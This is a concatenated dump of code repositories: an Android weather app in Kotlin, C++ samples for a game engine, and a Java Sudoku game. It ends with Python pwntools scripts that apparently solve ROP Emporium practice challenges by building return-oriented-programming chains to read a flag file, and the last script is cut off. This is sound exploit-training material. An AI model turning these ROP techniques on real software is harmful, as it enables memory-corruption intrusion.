context.getSystemService(Context.CONNECTIVITY_SERVICE) as ConnectivityManager
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
val networkCapabilities = connectivityManager.activeNetwork ?: return false
val actNw =
connectivityManager.getNetworkCapabilities(networkCapabilities) ?: return false
result = when {
actNw.hasTransport(NetworkCapabilities.TRANSPORT_WIFI) -> true
else -> false
}
} else {
val activeNetworkInfo = connectivityManager.activeNetworkInfo
result= activeNetworkInfo != null && activeNetworkInfo.isConnected &&(activeNetworkInfo.type==ConnectivityManager.TYPE_WIFI)
}
return result
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/database/repositry/WeatherDbRepository.kt
package com.geeta.weatherapp.database.repositry
import android.content.Context
import androidx.lifecycle.LiveData
import androidx.room.Room
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.WeatherDataDao
import io.reactivex.Maybe
import io.reactivex.Observable
import javax.inject.Inject
import javax.inject.Singleton
@Singleton
class WeatherDbRepository @Inject constructor(val weatherDataDao: WeatherDataDao,val locationDataDao: LocationDataDao) :
WeatherDbRepositoryLis {
companion object {
@Volatile
private var weatherDataBase: WeatherDataBase? = null
private val LOCK = Any()
operator fun invoke(context: Context) = weatherDataBase ?: synchronized(LOCK) {
weatherDataBase ?: buildDatabase(context).also { weatherDataBase = it }
}
private fun buildDatabase(context: Context) = Room.databaseBuilder(
context,
WeatherDataBase::class.java, "weather_db"
).build()
}
override fun getWeatherDetail():Observable<WeatherModel> {
return weatherDataDao.getWeather()
}
override fun deletWeatherDetail() {
weatherDataDao.deleteAll()
}
override fun insertWeatherDatail(weatherModel: WeatherModel) {
weatherDataDao.insertWeather(weatherModel)
}
override fun getDateAndTime(): Observable<List<Int>> {
return weatherDataDao.getDate()
}
override fun getLocation(): Observable<List<LocationModel>> {
return locationDataDao.getLocation()
}
override fun deletLocationDetail() {
locationDataDao.deleteAll()
}
override fun insertLocation(locationModel: LocationModel) {
locationDataDao.insertLocation(locationModel)
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/network/ErrorInterceptor.kt
package com.geeta.weatherapp.network
import com.geeta.weatherapp.data.ErrorResponse
import com.google.gson.Gson
import okhttp3.Interceptor
import okhttp3.Request
import okhttp3.Response
import okhttp3.ResponseBody
import org.json.JSONException
import org.json.JSONObject
class ErrorInterceptor : Interceptor {
override fun intercept(chain: Interceptor.Chain): Response {
val request: Request
request = chain.request()
val response = chain.proceed(request)
val contentType = response.body?.contentType()
if (response.code == 200 || response.code == 201 || response.code == 202 || response.code == 204) {
return response;
} else if (response.code == 400) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Internal Server Error", "400", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 401) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Unauthorized", "401", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 403) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Forbidden", "403", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 404) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Not Found", "404", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 405) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Method Not Allowed", "403", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 408) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Request Timeout", "408", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 415) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Unsupported Media Type", "415", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 429) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Too Many Request, Please Try after some time", "429", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 443) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Server Has some problem, Please Try after some time", "443", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
}
else if (response.code == 500) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Service unavailable", "500", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 503) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Service unavailable", "503", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else if (response.code == 504) {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Gateway Timeout", "504", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
} else {
val toJson = Gson().toJson(checkServerResponse(ErrorResponse("", "Something went wrong", "00", null), response))
val body = ResponseBody.create(contentType, toJson)
return response.newBuilder().body(body).build()
}
}
private fun checkServerResponse(defaultResponse: ErrorResponse, response: Response): ErrorResponse {
var status = defaultResponse;
val errorBodyValue = response.body?.string()
try {
val errorObject = JSONObject(errorBodyValue)
errorObject.let {
if (it.has("status")) {
if (it.get("status") is Int) {
status = ErrorResponse("", errorObject.getString("error"), response.code.toString(), "")
} else if (it.get("status") is JSONObject) {
status = ErrorResponse("", errorObject.getJSONObject("status").getString("messageDescription"), errorObject.getJSONObject("status").getString("errorCode"),"")
}
} else if (it.has("error_description") && it.getString("error_description") != null) {
status = ErrorResponse("", it.getString("error_description"), response.code.toString(), "")
} else if (it.has("defaultUserMessage") && it.getString("defaultUserMessage") != null) {
status = ErrorResponse("", it.getString("defaultUserMessage"), response.code.toString(), "")
}
}
} catch (e: JSONException) {
return defaultResponse
}
return status
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/base/BaseActivity.kt
package com.cafecraft.aps.ui.base
import android.annotation.SuppressLint
import android.app.AlertDialog
import android.app.Dialog
import android.app.Fragment
import android.content.Context
import android.content.Intent
import android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION
import android.os.Bundle
import android.view.View
import android.view.inputmethod.InputMethodManager
import com.geeta.weatherapp.R
import com.geeta.weatherapp.utils.ProgressDialogHelper
import dagger.android.support.DaggerAppCompatActivity
import io.reactivex.disposables.CompositeDisposable
import javax.inject.Inject
/**
* Created by Geetanjali on 02/08/17.
*/
abstract class BaseActivity : DaggerAppCompatActivity() {
protected var progressDialog: Dialog? = null
private var mDisposables: CompositeDisposable? = null
// abstract fun busInputReceived(busModal: Any?)
/* @Inject
lateinit var rxBus: RxBus*/
lateinit var progressDialogHelper: ProgressDialogHelper
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
// initRxBus()
progressDialogHelper = ProgressDialogHelper(this)
}
/* private fun initRxBus() {
mDisposables = CompositeDisposable()
val fragemerConnectEmitter = rxBus.asFlowable().publish()
mDisposables?.add(fragemerConnectEmitter.subscribe({ o ->
busInputReceived(o)
}))
mDisposables?.add(fragemerConnectEmitter.connect())
}
*/
fun moveNextTo(nextActivity: Class<*>) {
val intent = Intent(this, nextActivity)
intent.flags=FLAG_ACTIVITY_NO_ANIMATION
startActivity(intent)
}
fun moveNextToFinishingIt(nextActivity: Class<*>) {
moveNextTo(nextActivity)
finish()
}
override fun onDestroy() {
super.onDestroy()
mDisposables?.clear()
}
fun showAlert(message: String) {
val builder = AlertDialog.Builder(this@BaseActivity, R.style.AppTheme)
builder.setMessage(message).setTitle(R.string.app_name).setCancelable(true).setIcon(R.drawable.ic_launcher_background)
builder.create().show()
}
fun showAlertWithOkButton(message: String) {
val builder = AlertDialog.Builder(this@BaseActivity, R.style.AppTheme)
builder.setMessage(message).setTitle(R.string.app_name).setCancelable(true)
builder.setNeutralButton("Ok") { dialog, which -> dialog.dismiss() }
builder.create().show()
}
fun showHideProgressDialog(show:Boolean){
if(show) {
progressDialogHelper?.show()
}
else{
progressDialogHelper?.dismiss()
}
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/worker/WeatherWorkerFactory.kt
package com.geeta.weatherapp.worker
import android.content.Context
import androidx.work.Configuration
import androidx.work.Worker
import androidx.work.WorkerParameters
import javax.inject.Inject
interface WeatherWorkerFactory {
fun create(appContext: Context, params: WorkerParameters): Worker
}
|
b45c69dac9ede4765cc5534bfb4786bfb5da2691
|
[
"Kotlin",
"Gradle"
] | 39
|
Kotlin
|
GeetanjaliNaik/WeatherApp
|
486b9fea69206c6b2163c3e5f4ca5be709f9c75c
|
267d81177aa9427e3eca655fa013a52874a928a0
|
refs/heads/main
|
<file_sep>#include <entt/entt.hpp>
#include "pch.h"
#include <Kiss/systems/spriteMove.h>
#include <Kiss/systems/SpriteSheet.h>
#include "assets/data.h"
using namespace kiss;
ecs::flipbookData Anims[] = {
{ 1.f, id::spr::RectAnim1, 3}
};
namespace ecstest
{
entt::registry world;
void init(f32 w, f32 h, int numEntities)
{
using namespace ecs;
auto group = world.group<pos2d, vel2d>();
//auto spr = sprite{ id::spr::RectAnim1, 2 ,0 };
auto bounds = aabb(14, 32, w - 10, h);
flipbook::properties options{ 1,0,0,4,0 };
for (auto i = 0; i < numEntities; ++i)
{
auto entity = world.create();
auto pos = pos2d::rand(bounds);
auto vel = vel2d::rand(-90, 90, (float)kinc_random_get_in(150, 500));
auto s = vel.len() * 0.01f;
world.emplace<pos2d>(entity, pos);
world.emplace<vel2d>(entity, vel);
flipbook::play(world, entity, &Anims[0], options, kinc_random_get_in(0, 20) * 0.1f, s);
}
}
void update(f32 w, f32 h, float dt)
{
const aabb bounds(14, 32, w - 10, h);
ecs::move::step_in_aabb(world, dt, bounds);
ecs::system::UpdateFlipbooks(world, dt);
}
void render()
{
using namespace ecs;
auto view = world.group<pos2d, vel2d>(entt::get<flipbook>);
const iColor cMultiplier = 0x80203040;
const iColor colors[] = { 0xFF00A5FF, 0xFF800080, 0xFFCBC0FF };
const iColor dark[] = { mul(colors[0], cMultiplier), mul(colors[1], cMultiplier), mul(colors[2], cMultiplier) };
auto& b = gfx2d::batcher;
for (auto entity : view)
{
const auto& [position, animation] = view.get<pos2d, flipbook>(entity);
b.vertexdata(colors[animation.frameOffset], colors[animation.frameOffset], dark[animation.frameOffset], dark[animation.frameOffset]);
b.sprite(animation.getFrame(), position.x, position.y);
}
}
}<file_sep>#pragma once
#include "pch.h"
namespace kiss {
namespace id {
namespace spr {
constexpr u16 RectAnim1 = 0;
constexpr u16 RectAnim2 = 1;
constexpr u16 RectAnim3 = 2;
constexpr u16 RectRect = 3;
}
namespace s9 {
constexpr u16 Test = 0;
}
namespace fnt {
constexpr u8 Text = 0;
constexpr u8 Textbig = 1;
}
}
}<file_sep>#include <Kiss/pch.h>
#include <Kiss/render/basicPipeline.h>
#include <Kiss/render/quadbatcher.h>
#include <Kiss/time/delta.h>
#include <Kiss/gfx/color.h>
#include <Kiss/math/math.h><file_sep>#include <pch.h>
#include <Kiss/app.h>
#include <kinc/graphics4/graphics.h>
#include <kinc/display.h>
#include <kinc/math/random.h>
#include <kinc/input/keyboard.h>
#include <kinc/input/surface.h>
#include <kinc/input/mouse.h>
#include <string>//for string appending.
#include <assets/data.h>
#include "tests/gfxcommandstest.h"
#ifdef KISS_BOX2D
#include "tests/box2dtest.h"
#endif
#ifdef KISS_ENTT
#include "tests/ecstest.h"
#endif
#ifdef KISS_SOLOUD
#include "tests/soloudtest.h"
#endif
#ifdef KISS_IMGUI
#include "tests/imguitest.h"
#endif
using namespace kiss;
namespace win
{
u32 w = 1280;
u32 h = 720;
f32 sw = (f32)w;
f32 sh = (f32)h;
}
int app::start(int argc, char** argv)
{
kinc_random_init(0);
using namespace win;
framework::init("Hello World");
/*
#ifndef KORE_HTML5
auto d = kinc_display_current_mode(0);
w = d.width;
h = d.height;
#endif
*/
framework::setResolution(w, h);
gfxCmdBuffer::setup(sw, sh);
WithEntt(ecstest::init(sw, sh, 4000));
WithBox2D(box2dtest::init());
return 0;
}
void app::release() {
}
void app::resize(int x, int y)
{
using namespace win;
w = x; sw = (x / gfx2d::scaling);
h = y; sh = (y / gfx2d::scaling);
gfxCmdBuffer::setup(sw,sh);
}
void app::input(float dt) {
}
void app::prePhysics(float dt)
{
WithEntt(ecstest::update(win::sw,win::sh,dt));
WithBox2D(box2dtest::update(dt));
}
void app::postPhysics(float dt)
{
WithSoloud(soundtest::update(dt));
}
#ifdef KISS_IMGUI
void app::gui(float dt)
{
WithImgui(imguitest::exec(dt));
}
#endif
void app::render(float dt)
{
//kinc_g4_viewport(0, 0, win::w, win::h);
kinc_g4_scissor(0, 0, win::w, win::h);
//kinc_g4_viewport(0, 0, 1280, 720);
//kinc_g4_scissor(0, 0, 1280,720);
kinc_g4_clear(KINC_G4_CLEAR_COLOR, 0xFF808080, 0, 0);
//kinc_g4_clear(KINC_G4_CLEAR_COLOR, iColor((u8)kinc_random_get_in(40, 255), (u8)kinc_random_get_in(40, 255), (u8)kinc_random_get_in(40, 255)), 0, 0);
//----------------------------------------------------------------
auto& b = gfx2d::batcher;
b.begin(&gfx2d::base::pipeline, gfx2d::atlas0);
WithEntt(ecstest::render());
//----------------------------------------------------------------
gfxCmdBuffer::render();
//----------------------------------------------------------------
b.vertexdata(iColor::White, iColor::White, iColor::White, 0xFF404040);
b.scale9(id::s9::Test, aabb(10, 10, 210, 210));
b.vertexdata(iColor::White, iColor::White, 0xFFA0A0A0, 0xFFA0A0A0);
std::string str("fps : ");
str.append(std::to_string((int)(1.f / dt)));
auto tc = textCtx(10, 10);
b.text(tc, str.c_str());
//----------------------------------------------------------------
WithBox2D(box2dtest::render());
//----------------------------------------------------------------
b.end();
}<file_sep>#include "pch.h"
#include <Kiss/render/commands.h>
#include "assets/data.h"
using namespace kiss;
namespace gfxCmdBuffer
{
constexpr int buffersize = 512;
u8 bufferData[buffersize];
gfx2d::commandBuffer<u32> commandbuffer(bufferData, buffersize);
void setup(float x, float y) {
commandbuffer.reset();
using namespace gfx2d;
using namespace id;
constexpr sprId spr = spr::RectRect;
constexpr sprId s9 = s9::Test;
constexpr u8 font = fnt::Text;
u32 col[4] = { 0xFF505050, 0x80FFFFFF, 0xFF505050, 0x80FFFFFF };
commandbuffer
.vertexdata(col)
.sprite(spr, 16, 32)
.sprite(spr, 16, y)
.sprite(spr, x - 10, y)
.sprite(spr, x - 10, 32)
.scale9(s9, 250, 250, 294, 300)
.scale9(s9, 306, 250, 500, 300)
.textblock(100, 100).text("Ciao ")
.vertexdata(iColor::Red).font(font).text("Mondo!!!");
}
void render() {
commandbuffer.execute();
}
}<file_sep>#ifdef KISS_BOX2D
#include "pch.h"
#include <box2d/box2d.h>
#include <assets/data.h>
#include <kinc/math/random.h>
using namespace kiss;
constexpr float physcale = 100.f;
namespace {
b2World world = b2World({ 0.f, 9.81f });
float elapsed = 0;
b2Body* groundBody;
b2Body* body;
b2Body* body2;
}
namespace box2dtest {
void init() {
b2BodyDef groundBodyDef;
groundBodyDef.position.Set(6.40f, 5.f);
groundBodyDef.angle = deg2rad(20);
groundBody = world.CreateBody(&groundBodyDef);
b2PolygonShape groundBox;
groundBox.SetAsBox(10.0f * physcale, 0.05f);
groundBody->CreateFixture(&groundBox, 0.0f);
b2PolygonShape dynamicBox;
b2Vec2 vertices[4];
vertices[0].Set(-0.16f, 0.f);
vertices[1].Set(0.1f, 0.f);
vertices[2].Set(0.1f, -0.32f);
vertices[3].Set(-0.16f, -0.32f);
dynamicBox.Set(vertices, 4);
b2FixtureDef fixtureDef;
fixtureDef.shape = &dynamicBox;
fixtureDef.density = 1.0f;
fixtureDef.friction = 0.75f;
fixtureDef.restitution = 0.75f;
b2BodyDef bodyDef;
bodyDef.type = b2_dynamicBody;
bodyDef.position.Set(1.0f , 1.0f);
body = world.CreateBody(&bodyDef);
body->CreateFixture(&fixtureDef);
bodyDef.position.Set(0.9f , 1.3f);
body2 = world.CreateBody(&bodyDef);
body2->CreateFixture(&fixtureDef);
}
void update(float dt)
{
elapsed += dt;
if (elapsed > 10) {
body->SetTransform(b2Vec2(1.f + (float)kinc_random_get_in(-10, 10) / physcale, 1.0f), 0);
body->SetAngularVelocity(0);
body->SetLinearVelocity(b2Vec2(0, 0));
body2->SetTransform(b2Vec2(1.f + (float)kinc_random_get_in(-20, 20) / physcale, 1.32f), 0);
body2->SetAngularVelocity(0);
body2->SetLinearVelocity(b2Vec2(0, 0));
elapsed = 0;
}
world.Step(dt, 6, 2);
}
void render()
{
auto & b = gfx2d::batcher;
u32 color[4] = { iColor::White, iColor::Red, iColor::Green, iColor::Blue };
b.vertexdata(color);
b.sprite(id::spr::RectAnim1, 100, 100, rot(deg2rad(elapsed * 360)));
auto xform = body->GetTransform();
b.sprite(id::spr::RectAnim1, xform.p.x * physcale, xform.p.y * physcale, rot(xform.q.c, xform.q.s));
xform = body2->GetTransform();
b.sprite(id::spr::RectAnim1, xform.p.x * physcale, xform.p.y * physcale, rot(xform.q.c, xform.q.s));
}
}
#endif<file_sep>#pragma once
#include "pch.h"
#include "Kiss/sound/sound.h"
#include "soloud.h"
#include "soloud_sfxr.h"
#include <kinc/math/random.h>
using namespace kiss;
using namespace SoLoud;
namespace soundtest {
auto elapsed = 0.f;
Sfxr sfx;
handle h;
void play() {
auto& s = sound::manager;
sfx.loadPreset(3, kinc_random_get());
h = s.play(sfx);
s.setRelativePlaySpeed(h, kinc_random_get_in(75, 150) / 100.f);
}
void update(float dt) {
elapsed += dt;
if (elapsed > 1.5f) {
play();
elapsed = 0.f;
}
}
}<file_sep>#include "pch.h"
#include <Kiss/app.h>
#include <imgui.h>
using namespace kiss;
namespace imguitest
{
bool demo_window_open = true;
void exec(float dt)
{
ImGui::ShowDemoWindow(&demo_window_open);
}
}<file_sep># KissBasicSample
Sample to show off some Kiss engine features.
|
10c1d9d9119b6d12700451290e5a0721022bb2b9
|
[
"Markdown",
"C",
"C++"
] | 9
|
C++
|
Paolo-Oliverio/KissBasicSample
|
fab3d893581c350528bf6c119dde464cdbe2f12e
|
311c478e3b103706e6cd799ec56375182cdc5b74
|
refs/heads/master
|
<repo_name>GGStudio/Clear-Sudoku<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Group.java
package com.ggstudio.clearsudoku.engine;
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Group {
public Cell[] cells;
public GroupType type;
public Group(GroupType groupType, Cell c0, Cell c1, Cell c2,
Cell c3, Cell c4, Cell c5,
Cell c6, Cell c7, Cell c8)
{
cells = new Cell[9];
cells[0]=c0;
cells[1]=c1;
cells[2]=c2;
cells[3]=c3;
cells[4]=c4;
cells[5]=c5;
cells[6]=c6;
cells[7]=c7;
cells[8]=c8;
type=groupType;
setTypeToCells();
}
private void setTypeToCells(){
if(type==GroupType.BLOCK){
for(int i=0;i<9;i++)
cells[i].setBlock(this);
}
else if(type==GroupType.ROW){
for(int i=0;i<9;i++)
cells[i].setRow(this);
}
else if(type==GroupType.COLUMN){
for(int i=0;i<9;i++)
cells[i].setColumn(this);
}
}
public int getSum(){
int sum=0;
for(int i=0;i<cells.length;i++){
sum+=cells[i].getValue();
}
return sum;
}
public boolean isAllUnique(){
int[] availableDigitsInGroup = new int[9];
for(int i=0;i<cells.length;i++){
availableDigitsInGroup[cells[i].getValue()]+=1;
}
boolean flag=true;
for(int i=0; i<availableDigitsInGroup.length; i++){
if (availableDigitsInGroup[i]!=1)
flag=false;
}
return flag;
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Move.java
package com.ggstudio.clearsudoku.engine;
/**
* Created by Андрей on 07.01.2015.
*/
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Move {
public Move(int x,int y, int value,MoveType type) {
_x=x;
_y=y;
_value=value;
_type=type;
}
private int _x,_y;
private int _value;
private MoveType _type;
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Enums.java
package com.ggstudio.clearsudoku.engine;
/**
* Created by Андрей on 07.01.2015.
*/
public class Enums {
public enum MoveType{
INCLUDE,EXCLUDE
}
public enum GroupType{
BLOCK, ROW, COLUMN
}
public enum Complexity {
EASY, NORMAL, HARD
}
public enum CellState {
BLANK, DEFINED, START
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/NewGameFragment.java
package com.ggstudio.clearsudoku;
import android.app.FragmentManager;
import android.app.FragmentTransaction;
import android.content.Intent;
import android.os.Bundle;
import android.app.Fragment;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.Button;
public class NewGameFragment extends Fragment {
private Button buttonEasy;
private Button buttonModerate;
private Button buttonHard;
public NewGameFragment() {
// Required empty public constructor
}
@Override
public View onCreateView(LayoutInflater inflater, ViewGroup container,
Bundle savedInstanceState) {
final View newGameFragment = inflater.inflate(R.layout.fragment_new_game, container, false);
final Intent intent = new Intent(NewGameFragment.this.getActivity(), GameActivity.class);
buttonEasy = (Button) newGameFragment.findViewById(R.id.buttonEasy);
buttonModerate = (Button) newGameFragment.findViewById(R.id.buttonModerate);
buttonHard = (Button) newGameFragment.findViewById(R.id.buttonHard);
buttonEasy.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
intent.putExtra("difficulty", "easy");
startActivity(intent);
}
});
buttonModerate.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
intent.putExtra("difficulty", "moderate");
startActivity(intent);
}
});
buttonHard.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
intent.putExtra("difficulty", "hard");
startActivity(intent);
}
});
//return inflater.inflate(R.layout.fragment_new_game, container, false);
return newGameFragment;
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Sudoku.java
package com.ggstudio.clearsudoku.engine;
/**
* Created by Андрей on 07.01.2015.
*/
import java.util.ArrayList;
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Sudoku {
SudokuField field;
ArrayList<Move> moves;
Complexity complexity;
int turn = 0;
public Sudoku() {
moves = new ArrayList<Move>();
field= new SudokuField();
complexity=Complexity.NORMAL;
}
}
<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/GameViewAdapter.java
package com.ggstudio.clearsudoku;
/**
* Created by andrey on 06.01.15.
*/
import android.app.Activity;
import android.view.Gravity;
import android.view.View;
import android.view.ViewGroup;
import android.widget.BaseAdapter;
import android.widget.GridView;
import android.widget.TextView;
import java.util.List;
/** Adapter class for GridView element (GameField).*/
public class GameViewAdapter extends BaseAdapter {
Activity ac;
List<Integer> nums;
int oneWidth;
GameViewAdapter(Activity ac, List<Integer> nums, int oneWidth) {
this.ac = ac;
this.nums = nums;
this.oneWidth = oneWidth;
}
@Override
public int getCount() {
return nums.size();
}
@Override
public Object getItem(int location) {
return nums.get(location);
}
@Override
public long getItemId(int arg0) {
return 0;
}
@Override
public View getView(int location, View v, ViewGroup parent) {
//int number = nums.get(location);
TextView tv = new TextView(ac);
GridView.LayoutParams par = new GridView.LayoutParams(oneWidth , oneWidth );
tv.setLayoutParams(par);
tv.setGravity(Gravity.CENTER);
tv.setTextSize(18);
switch (nums.get(location)){
case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:case 8:
tv.setId(nums.get(location)+11);
tv.setTag(Integer.toString(nums.get(location)+11));
break;
case 9:case 10:case 11:case 12:case 13:case 14:case 15:case 16:case 17:
tv.setId(nums.get(location)+12);
tv.setTag(Integer.toString(nums.get(location)+12));
break;
case 18:case 19:case 20:case 21:case 22:case 23:case 24:case 25:case 26:
tv.setId(nums.get(location)+13);
tv.setTag(Integer.toString(nums.get(location)+13));
break;
case 27:case 28:case 29:case 30:case 31:case 32:case 33:case 34:case 35:
tv.setId(nums.get(location)+14);
tv.setTag(Integer.toString(nums.get(location)+14));
break;
case 36:case 37:case 38:case 39:case 40:case 41:case 42:case 43:case 44:
tv.setId(nums.get(location)+15);
tv.setTag(Integer.toString(nums.get(location)+15));
break;
case 45:case 46:case 47:case 48:case 49:case 50:case 51:case 52:case 53:
tv.setId(nums.get(location)+16);
tv.setTag(Integer.toString(nums.get(location)+16));
break;
case 54:case 55:case 56:case 57:case 58:case 59:case 60:case 61:case 62:
tv.setId(nums.get(location)+17);
tv.setTag(Integer.toString(nums.get(location)+17));
break;
case 63:case 64:case 65:case 66:case 67:case 68:case 69:case 70:case 71:
tv.setId(nums.get(location)+18);
tv.setTag(Integer.toString(nums.get(location)+18));
break;
case 72:case 73:case 74:case 75:case 76:case 77:case 78:case 79:case 80:
tv.setId(nums.get(location)+19);
tv.setTag(Integer.toString(nums.get(location)+19));
break;
}
//tv.setText(tv.getTag().toString());
return tv;
}
}<file_sep>/app/src/main/java/com/ggstudio/clearsudoku/engine/Cell.java
package com.ggstudio.clearsudoku.engine;
import com.ggstudio.clearsudoku.engine.Enums.*;
public class Cell {
public Cell(int x,int y) {
this(x,y,-1);
}
public Cell(int x, int y, int val){
this.setX(x);
this.setY(y);
digits = new boolean[9];
for(int i=0;i<9;i++)
digits[i]=false;
if (val>0 && val<10)
{
_state = CellState.DEFINED;
}
else
{
_state = CellState.BLANK;
}
_value = val;
_count = 0;
}
public void setState(CellState _state) {
this._state = _state;
}
public CellState getState() {
return _state;
}
private void setX(int x) {
this._x = x;
}
private void setY(int y) {
this._y = y;
}
public int getX() {
return _x;
}
public int getY() {
return _y;
}
/* public void exclude(int excludeValue){
if (_state==CellState.BLANK){
if(excludeValue>0 && excludeValue<10){
if (digits[excludeValue-1]){
digits[excludeValue-1]=false;
_count--;
if (_count==1) {
_state=CellState.DEFINED;
}
}
}
}
}
*/
public void trigger(int digit){
if(digit<0 || digit>=9) return;
if (_state==CellState.START)return;
digits[digit]=!digits[digit];
if (digits[digit])
_count++;
else
_count--;
if (_count==1){
_value=findSingleValue();
_state=CellState.DEFINED;
} else {
_value=-1;
_state=CellState.BLANK;
}
}
private int findSingleValue(){
int i;
int s=0;
int count=0;
for(i=0;i<9;i++){
if (digits[i]){
count++;
s=i;
}
}
if(count==1) return s;
return -1;
}
public boolean hasDigit(int i){
if(i>0 && i<10){
return digits[i];
} else
return false;
}
public boolean[] getDigits() {
return digits;
}
public void setRow(Group row) {
this.row = row;
}
public void setBlock(Group block) {
this.block = block;
}
public void setColumn(Group column) {
this.column = column;
}
public void setValue(int value) {
this._value = value;
_state=CellState.START;
}
public boolean isDefined(){
return (_state==CellState.DEFINED);
}
public int getValue() {
return _value;
}
private CellState _state;
public Group row,block,column;
private boolean[] digits;
private int _value;
private int _count;
private int _x,_y;
}
|
9518530fb521ac1b770556f8dad927711084d98f
|
[
"Java"
] | 7
|
Java
|
GGStudio/Clear-Sudoku
|
0a4622b53cacf53b853029feea0e70ea4109d85d
|
55ee01ab042f148b6d83b0ab75bda39981d02582
|
refs/heads/master
|
<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './write432'
elf = ELF(filename)
io = process(filename)
# gadgets
r = ROP(elf)
pop = p32(r.edi.address)
mov = p32(0x8048543)
bss = elf.bss()
# main
r.raw(cyclic(44))
# 1st write
r.raw(pop)
r.raw(p32(bss))
r.raw(b'flag')
r.raw(mov)
# 2nd write
r.raw(pop)
r.raw(p32(bss+4))
r.raw(b'.txt')
r.raw(mov)
# call print_file
r.call('print_file', [bss])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='i386')
filename = './badchars32'
elf = ELF(filename)
io = process(filename)
# gadgets
xor = p32(0x8048547) # xor byte ptr [ebp], bl; ret;
mov = p32(0x804854f) # mov dword ptr [edi], esi; ret;
pop_ebp = p32(0x80485bb) # pop ebp; ret;
pop_ebx = p32(0x804839d) # pop ebx; ret;
pop_esi = p32(0x80485b9) # pop esi; pop edi; pop ebp; ret;
bss = elf.bss()
# helper functions
def write_string(string, index):
rop = ROP(elf)
rop.raw(pop_esi)
rop.raw(string)
rop.raw(p32(bss+(index*4)))
rop.raw(b'AAAA') # filler
rop.raw(mov)
return rop.chain()
def xor_index(index):
rop = ROP(elf)
rop.raw(pop_ebp)
rop.raw(bss+index)
rop.raw(pop_ebx)
rop.raw(0x2)
rop.raw(xor)
return rop.chain()
# bad chars 'x' 'g' 'a' '.'
# 7867612e
# xor'd string 'flce,tzt'
# 0x02 key at indexes [2,3,4,6]
payload = b""
payload += cyclic(44)
payload += write_string(b'flce', 0)
payload += write_string(b',tzt', 1)
payload += xor_index(2)
payload += xor_index(3)
payload += xor_index(4)
payload += xor_index(6)
# call print_file
r = ROP(elf)
r.call('print_file', [bss])
payload += r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './write4'
elf = ELF(filename)
io = process(filename)
# gadgets
r = ROP(elf)
pop = p64(r.r14.address) # pop r14; pop r15; ret;
mov = p64(0x400628) # mov qword [r14], r15
bss = elf.bss()
# main
r.raw(cyclic(40))
# write
r.raw(pop)
r.raw(p64(bss))
r.raw(b'flag.txt')
r.raw(mov)
# call print_file
r.call('print_file', [bss])
payload = r.chain()
io.recvuntil('>')
io.sendline(payload)
io.recvuntil('!\n')
flag = io.recvline().decode().rstrip()
log.success("Flag: {}".format(flag))<file_sep>#!/bin/python3
from pwn import *
context.clear(arch='amd64')
filename = './split'
elf = ELF(filename)
io = process(filename)
r = ROP(elf)
r.raw(cyclic(40))
